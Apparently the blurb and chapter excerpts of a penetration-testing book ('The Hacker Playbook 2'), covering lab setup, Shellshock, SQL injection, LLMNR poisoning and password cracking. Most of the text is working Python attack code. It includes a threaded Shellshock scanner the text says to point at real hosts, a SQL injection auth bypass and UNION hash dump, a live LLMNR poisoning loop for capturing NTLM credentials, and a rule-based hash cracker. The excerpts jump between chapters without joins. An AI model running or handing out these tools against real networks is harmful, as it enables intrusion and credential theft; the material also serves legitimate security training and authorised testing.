Author: Peter Kim
Pub Date: 2015
Size: 38 Mb
Just as a professional athlete doesn’t show up without a solid game plan, ethical hackers, IT professionals, and security researchers should not be unprepared, either. The Hacker Playbook provides them their own game plans. Written by a longtime security professional and CEO of Secure Planet, LLC, this step-by-step guide to the “game” of penetration hacking features hands-on examples and helpful advice from the top of the field.
Through a series of football-style “plays,” this straightforward guide gets to the root of many of the roadblocks people may face while penetration testing—including attacking different types of networks, pivoting through security controls, privilege escalation, and evading antivirus software.
From “Pregame” research to “The Drive” and “The Lateral Pass,” the practical plays listed can be read in order or referenced as needed. Either way, the valuable advice within will put you in the mindset of a penetration tester of a Fortune 500 company, regardless of your career or level of experience.
This second version of The Hacker Playbook takes all the best “plays” from the original book and incorporates the latest attacks, tools, and lessons learned. Double the content compared to its predecessor, this guide further outlines building a lab, walks through test cases for attacks, and provides more customized code.
Whether you’re downing energy drinks while desperately looking for an exploit, or preparing for an exciting new job in IT security, this guide is an essential part of any ethical hacker’s library—so there’s no reason not to get in the game.
Building Your Penetration Testing Box
In The Hacker Playbook One, I received some comments on why I have you build and install the tools instead of creating one script to automate it all. The main reason I have my readers manually go through these steps is that these are extremely important tools, and doing it by hand will help you remember what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well-organized, but if you don’t know a tool is installed, or you haven’t played around with the individual attacks, then it won’t really be helpful in that dire-need situation.
Setting Up A Penetration Testing Box
If you set up your box from the first book, you can breeze over this section. As you know, I always like bringing two different laptops to an engagement. The first is a Windows box and the second is either an OS X or Linux host. The reason I bring two laptops is because I have been on penetration tests where, on very specific networks, the OS X host would not connect to the network. Instead of spending hours trying to figure out why, I just started all of my attacks and scanning from my Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times having two laptops has saved me.
It doesn’t matter if you run Windows, OS X, or some Linux flavor on your base system, but there are a few musts. First, you need to install a Virtual Machine (VM) platform. You can use VirtualBox or VMware Player or any others of your choice. Both are free on Windows, but on OS X only VirtualBox is free. I would highly recommend getting the commercial versions for your VM platform as they have a wealth of extra features, such as encryption, snapshots, and much better VM management.
Since we are going to install most of our tools on our VMs, the most important step is to keep your base system clean. Try not to even browse personal sites on the base image. This way, your base system is always clean and you won’t ever bring malware onto a client site (I have seen this many times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is revert back to the baseline image, patch and update tools, and add any additional tools I need. Trust me, this tactic is a lifesaver. I can’t count the number of past assessments where I spent way too much time setting up a tool that should have already been installed.
What this chapter has tried to do is to help you build a standard platform for testing, make sure you have a strong foundation in PowerShell, and give you an understanding of the basics of binary exploitation.
Tools will always change, so it is important to keep your testing platforms up-to-date and patched. I have included all the tools that are used in this book and, hopefully, this information will be enough to get you started. If you feel that I am missing any critical tools, feel free to leave comments at: www.thehackerplaybook.com.
Take a full clean snapshot of your working VMs and let’s start discovering and attacking networks.
This will write a shell script to the cgi-bin folder that we need to use to execute the vulnerability. Remember that for something like Shellshock to work, the target needs a CGI script in the cgi-bin folder that is executed by (or calls out to) a vulnerable bash, because the bug fires when bash imports the attacker-controlled HTTP headers as environment variables. You can access it by going to a browser and inputting http://[IP of vulnerable host]/cgi-bin/test.cgi. If everything worked, you should see a page that just says “hi”.
Going back to our attacking Kali host, we are going to use a tool I created called icmpshock.py (note that there is also a Metasploit module, so try them all). The reason I created this script is because I wanted the tool to brute-force through all common cgi type files at an amazing speed and test all the common HTTP header information (User-Agent, Cookie, Host, Referer) with Shellshock. As long as you have a pretty big pipe, you can take advantage of Python’s threading to brute-force through all cgi files/directories in just seconds. Remember that we are going for quick and efficient, trying to pop as many boxes as possible.
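The following is an added example, not the book’s icmpshock.py or the Metasploit module: a threaded probe that sends the CVE-2014-6271 header payload through each of the common headers against a list of CGI paths and looks for a marker echoed back in the body. So that it runs offline, it also starts an in-process fake target whose test.cgi only simulates a vulnerable bash (a header that starts with `() {` has the text after the closing brace treated as shell commands, echo only). The path list, the marker string, and the fake server are constructed for the demo; point `scan()` at a real host to use it for real.

```python
# Added example (not icmpshock.py): threaded Shellshock header probe plus a
# constructed, in-process fake target so the scan can be run offline.
import http.server
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

MARKER = "shellshock-marker"
# Bash function definition followed by trailing commands: a vulnerable bash runs
# the trailing part when it imports the header as an environment variable.  The
# first "echo" emits the blank line that terminates the CGI response headers.
PAYLOAD = "() { :; }; echo; echo " + MARKER
HEADERS = ["User-Agent", "Cookie", "Host", "Referer"]
CGI_PATHS = [  # constructed list; a real run uses a much longer one
    "/cgi-bin/test.cgi", "/cgi-bin/status", "/cgi-bin/printenv", "/cgi-bin/admin.cgi",
]
# No proxy: targets are on the internal network we are standing in.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe(base_url, path, header, timeout=3):
    """Send PAYLOAD in one header; return (path, header) if MARKER came back."""
    req = urllib.request.Request(base_url + path, headers={header: PAYLOAD})
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:       # 404/500 pages still carry a body
        body = err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None
    return (path, header) if MARKER in body else None


def scan(base_url, paths=CGI_PATHS, headers=HEADERS, workers=16):
    """Try every path/header pair concurrently; return the hits in input order."""
    jobs = [(p, h) for p in paths for h in headers]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda job: probe(base_url, *job), jobs))
    return [r for r in results if r]


class FakeVulnerableCGI(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a host whose test.cgi runs under a vulnerable bash.
    It only simulates the bug: anything after the '}' of a '() {' header value is
    split on ';' and each 'echo' is honoured."""

    def do_GET(self):
        if self.path != "/cgi-bin/test.cgi":
            self.send_error(404)
            return
        out = []
        for value in self.headers.values():
            if value.startswith("() {") and "}" in value:
                for cmd in value.split("}", 1)[1].split(";"):
                    cmd = cmd.strip()
                    if cmd.startswith("echo"):
                        out.append(cmd[4:].strip())
        out.append("hi")                          # what test.cgi prints normally
        body = "\n".join(out).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):                 # keep scan output clean
        pass


def start_fake_target():
    """Serve the fake target on a free loopback port; returns (server, base_url)."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), FakeVulnerableCGI)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    srv, url = start_fake_target()
    try:
        for path, header in scan(url):
            print("VULNERABLE: %s via %s header" % (path, header))
    finally:
        srv.shutdown()
        srv.server_close()
```

Against a real target the marker check is the whole point: a 200 with “hi” tells you the script exists, but only the echoed marker proves the header was executed by bash, so there is no need to guess at exploitability from status codes.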
Web Application Penetration Testing
In the initial prep section, we set up a couple of vulnerable VMs for testing. Since some of this section will be based on the OWASP Broken Web Application VM, I highly recommend you set it up prior to reading this chapter. You can download the VM here: sourceforge.net/projects/owaspbwa/files/
Once you download it, you can unzip it and run it in either VMware or VMware Player. Once loaded, grab the IP of the virtual machine and open it up in your local browser. It should look something like the following:
From either the scanning results or from just poking around, you might be able to identify some SQL injection (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full compromise of the database or of the system itself. Two open source tools that I have found to work most of the time are SQLmap and Sqlninja. Let’s go through the process from identification to exploitation.
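Before handing the target to SQLmap, it helps to see what the tool is actually doing. The following added example (not from the book, SQLmap or Sqlninja) builds a small sqlite3 users table, shows a login query that concatenates user input next to the parameterised fix, and then walks the two steps the paragraph names: identification with a boolean-based pair of payloads (same parameter, a true and a false condition; a difference in the result means the input is being interpreted as SQL) and exploitation with a UNION that pulls every username and hash through the two columns the original query already selects. The schema, users, and unsalted SHA-256 password hashes are constructed for the demo and are not a recommendation for storing passwords.

```python
# Added example: vulnerable vs. parameterised lookup, boolean-based detection,
# and UNION-based extraction against a constructed sqlite3 database.
import hashlib
import sqlite3


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """In-memory database with a constructed users table (demo data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT, role TEXT)"
    )
    demo_users = [("admin", "Str0ngAdminPass!", "admin"), ("bob", "bobpass", "user")]
    conn.executemany(
        "INSERT INTO users (username, pw_hash, role) VALUES (?, ?, ?)",
        [(u, sha256_hex(p), r) for u, p, r in demo_users],
    )
    return conn


def find_user_vulnerable(conn, username, password):
    """Deliberately vulnerable: user input is pasted into the SQL text."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, sha256_hex(password)))
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username, password):
    """Fixed version: placeholders keep the input as data, never as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, sha256_hex(password))).fetchall()


def is_injectable(conn, lookup):
    """Identification (boolean-based): an always-true and an always-false
    condition in the same parameter must give the same rows if the input is
    treated as data.  Different rows mean the condition was evaluated as SQL."""
    true_rows = lookup(conn, "bob' AND '1'='1' -- ", "wrong-password")
    false_rows = lookup(conn, "bob' AND '1'='2' -- ", "wrong-password")
    return true_rows != false_rows


def dump_hashes(conn, lookup):
    """Exploitation: a UNION with the same column count returns every
    username and password hash in place of the expected (username, role) rows."""
    return lookup(conn, "x' UNION SELECT username, pw_hash FROM users -- ", "anything")


if __name__ == "__main__":
    db = make_db()
    print("auth bypass:", find_user_vulnerable(db, "admin' -- ", "wrong-password"))
    print("injectable (vulnerable):", is_injectable(db, find_user_vulnerable))
    print("injectable (safe):", is_injectable(db, find_user_safe))
    for user, digest in dump_hashes(db, find_user_vulnerable):
        print(user, digest)
```

The `-- ` comment marker is what strips the password check off the end of the statement; SQLmap tries the same boolean pairs (and time-based and error-based variants) automatically, and its `--dump` is the UNION step generalised across column counts and databases.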
The Lateral Pass – Moving Through The Network
At this point, you have compromised some servers and services through the SUCK network, but unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t seem to move forward. You might be on a network, but without privileges or account credentials, you would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your ability to move through the network and gain access to domain administrative accounts. However, as a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where sensitive data is being stored and gain access to those environments. This might require pivoting through essential employees and understanding how the corporation segments their data.
This section will focus on moving through the network and going from a limited user, all the way to owning the whole network. We will cover such topics as starting without credentials, proxying through hosts, having limited domain credentials, and then having local/domain credentials.
On The Network Without Credentials:
Let’s say that you are on the network, but you don’t have any credentials yet. Maybe you cracked their WPA2-Personal Wi-Fi password or popped a box that wasn’t connected to the domain. I might first turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other passive types of attacks. Once I feel like I have an understanding of the local network, I will start compromising systems using a variety of attacks specified in the next few sections.
(github.com/SpiderLabs/Responder) (Kali Linux)
One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is a tool that listens for and responds to LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS over TCP/IP Name Service) queries. Both are fallback name-resolution protocols that Windows hosts send to the local segment when DNS cannot resolve a name, and neither one authenticates the answer, so whoever replies first claiming to be the requested name receives the victim’s connection and the NTLM authentication attempt that comes with it.
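To make the exchange concrete, here is an added example that is not Responder’s code: it builds the LLMNR query a Windows host sends when DNS fails (the message format is the DNS one from RFC 4795: a 12-byte header, then length-prefixed name labels), parses it the way a poisoner must, and crafts the unicast answer that points the requested name at the attacker’s address, echoing the transaction ID and the question so the victim accepts it. The hostname, transaction ID and attacker IP are constructed; the `poison_loop()` at the end is the live version (it binds UDP 5355 and joins 224.0.0.252, which needs root) and is not run here.

```python
# Added example (not Responder): LLMNR query/poisoned-response construction
# per RFC 4795, plus the live loop that would answer real queries.
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group for LLMNR
LLMNR_PORT = 5355
QTYPE_A = 1
QTYPE_AAAA = 28
QCLASS_IN = 1
FLAG_QR = 0x8000              # set in responses, clear in queries


def encode_name(name):
    """Hostname -> DNS-style length-prefixed labels ending in a zero byte."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(pkt, off):
    """Inverse of encode_name; returns (name, offset just past the terminator)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode())
        off += n


def build_llmnr_query(txid, name, qtype=QTYPE_A):
    """What a Windows host multicasts when DNS cannot resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_llmnr_query(pkt):
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_QR or qdcount != 1:
        return None                      # a response, or not a single question
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_poisoned_response(query_pkt, attacker_ip, ttl=30):
    """Answer any A query with the attacker's address.  The response must echo
    the query's transaction ID and question section or the victim ignores it."""
    q = parse_llmnr_query(query_pkt)
    if q is None or q["qtype"] != QTYPE_A or q["qclass"] != QCLASS_IN:
        return None
    header = struct.pack("!HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)  # QD=1, AN=1
    answer = (encode_name(q["name"])
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)   # type, class, TTL, RDLENGTH
              + socket.inet_aton(attacker_ip))
    return header + q["question"] + answer


def parse_llmnr_response(pkt):
    """Decode the first answer record so the exchange can be checked end to end."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & FLAG_QR or ancount < 1:
        return None
    _, off = decode_name(pkt, 12)
    off += 4                                  # skip the question's qtype/qclass
    name, off = decode_name(pkt, off)
    rtype, _, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    return {"txid": txid, "name": name, "type": rtype, "ttl": ttl,
            "ip": socket.inet_ntoa(pkt[off:off + rdlen])}


def poison_loop(attacker_ip, iface_ip="0.0.0.0"):
    """Live loop (needs root; not exercised here): join the LLMNR group and
    answer every A query it hears, unicast, back to the querier's source port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(iface_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        pkt, src = sock.recvfrom(1024)
        resp = build_poisoned_response(pkt, attacker_ip)
        if resp:
            sock.sendto(resp, src)
```

Once the victim resolves the name to the attacker, it connects to whatever service it wanted (SMB, HTTP and so on) and authenticates with NTLM; Responder runs those listeners itself and records the resulting NetNTLM challenge/response for offline cracking. The same packet layout applies to NBT-NS on UDP 137, with NetBIOS-encoded names in place of the labels above.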
Special Teams – Cracking, Exploits, And Tricks
This section focuses on all other methods that can assist in penetration testing, but do not fit in the other sections. I will discuss some of the tips and tricks I have for cracking password hashes, searching for vulnerabilities, and some short cuts.
There are many different tools to use for password cracking; however, I am going to focus mainly on two tools that I use: John the Ripper (JtR) and oclHashcat. These are both excellent tools for cracking passwords.
Before I can start talking about different password crackers, it is important to make sure you understand the basic definitions. The three things you should generally configure for an efficient password-cracking process are the wordlists, the rules, and the hashing algorithm of the hashes you are attacking.
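The following added example, which is not code from the book, John the Ripper or oclHashcat, shows how those three ingredients fit together in a minimal dictionary cracker: a wordlist supplies base words, a rule engine that understands a small subset of the hashcat/JtR rule syntax (`:`, `l`, `u`, `c`, `r`, `$X`, `^X`, `sXY`) mangles each word into candidates, and the hash algorithm selected to match the dump turns each candidate into a digest to compare against the targets. The wordlist, rule list and target hashes are constructed for the demo; the rule syntax is the subset described above, not a full implementation of either tool.

```python
# Added example: wordlist + rules + hash algorithm, the three knobs of a
# dictionary attack, in a self-contained cracker (not JtR or oclHashcat code).
import hashlib

ALGORITHMS = {"md5": hashlib.md5, "sha1": hashlib.sha1, "sha256": hashlib.sha256}

# Constructed wordlist; a real run uses rockyou.txt or a client-specific list.
WORDLIST = ["password", "summer", "welcome", "company", "letmein"]

# Constructed rules in (a subset of) hashcat/JtR syntax:
#   ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalise, 'r' reverse,
#   '$X' append X, '^X' prepend X, 'sXY' replace every X with Y.
RULES = [":", "c", "u", "c$1", "c$2$0$1$5", "c$2$0$1$5$!", "sa@", "sa@so0", "c$!"]


def apply_rule(word, rule):
    """Apply one rule string to a word; unknown commands raise so typos show up."""
    i = 0
    while i < len(rule):
        cmd = rule[i]
        if cmd == ":":
            pass
        elif cmd == "l":
            word = word.lower()
        elif cmd == "u":
            word = word.upper()
        elif cmd == "c":
            word = word[:1].upper() + word[1:].lower()
        elif cmd == "r":
            word = word[::-1]
        elif cmd == "$":
            i += 1
            word = word + rule[i]
        elif cmd == "^":
            i += 1
            word = rule[i] + word
        elif cmd == "s":
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError("unknown rule command %r in %r" % (cmd, rule))
        i += 1
    return word


def candidates(wordlist, rules):
    """Yield (candidate, rule) pairs, skipping candidates already produced."""
    seen = set()
    for word in wordlist:
        for rule in rules:
            cand = apply_rule(word, rule)
            if cand not in seen:
                seen.add(cand)
                yield cand, rule


def hash_hex(algo, text):
    """Digest of `text` under the named algorithm, lowercase hex."""
    return ALGORITHMS[algo](text.encode()).hexdigest()


def crack(targets, algo, wordlist=WORDLIST, rules=RULES):
    """Return {hash: (plaintext, rule)} for every target hash recovered."""
    remaining = {h.lower() for h in targets}
    found = {}
    for cand, rule in candidates(wordlist, rules):
        if not remaining:
            break
        digest = hash_hex(algo, cand)
        if digest in remaining:
            found[digest] = (cand, rule)
            remaining.discard(digest)
    return found


if __name__ == "__main__":
    demo = [hash_hex("sha256", "Summer2015!"), hash_hex("sha256", "p@ssw0rd")]
    for digest, (plain, rule) in crack(demo, "sha256").items():
        print("%s  %s  (rule %s)" % (digest, plain, rule))
```

Picking the wrong algorithm is the most common reason a crack session finds nothing: the candidates may be right, but every digest is computed the wrong way, so confirm the hash type (and whether it is salted) from the dump before choosing rules or a bigger wordlist.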